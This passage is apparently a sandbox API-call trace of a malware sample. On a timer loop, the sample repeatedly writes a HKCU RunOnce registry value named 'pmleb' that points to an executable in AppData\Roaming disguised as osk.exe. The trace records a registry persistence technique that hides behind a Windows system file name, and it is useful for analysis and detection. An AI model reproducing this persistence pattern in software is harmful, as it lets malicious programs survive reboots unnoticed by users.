phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.656] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.656] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.656] RegCloseKey (hKey=0x280) returned 0x0 [0080.656] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.657] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.657] SetTimer (hWnd=0x20280, nIDEvent=0x2084, uElapse=0xa, lpTimerFunc=0x0) returned 0x2084 [0080.657] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.658] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.658] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.658] KillTimer (hWnd=0x20280, uIDEvent=0x2084) returned 1 [0080.658] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.658] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0080.658] IUnknown:Release (This=0x787518) returned 0x1 [0080.658] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.658] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.658] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.659] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, 
Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.659] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0080.659] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.659] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xa [0080.659] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.660] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0080.660] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.660] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.660] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.660] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.660] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.660] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.660] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.660] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.661] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.661] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.661] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.661] RegCloseKey (hKey=0x280) returned 0x0 [0080.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.661] SetTimer (hWnd=0x20280, nIDEvent=0x2085, uElapse=0xa, lpTimerFunc=0x0) returned 0x2085 [0080.661] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.673] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.673] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.673] KillTimer (hWnd=0x20280, uIDEvent=0x2085) returned 1 [0080.673] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.673] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.674] IUnknown:Release (This=0x787518) returned 0x1 [0080.674] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.674] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.674] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.674] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.674] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0080.674] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.674] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xb [0080.674] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.675] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0080.675] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.675] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.675] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.675] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.675] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.675] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.676] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.676] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.676] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.676] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.676] RegCloseKey (hKey=0x280) returned 0x0 [0080.676] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.676] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.676] SetTimer (hWnd=0x20280, nIDEvent=0x2086, uElapse=0xa, lpTimerFunc=0x0) returned 0x2086 [0080.676] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.689] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.689] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.689] KillTimer (hWnd=0x20280, uIDEvent=0x2086) returned 1 [0080.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.689] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.689] IUnknown:Release (This=0x787518) returned 0x1 [0080.689] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.689] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.690] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.690] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.690] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0080.690] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.690] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xc [0080.690] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.691] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0080.691] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.691] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.691] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.691] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.691] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.691] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 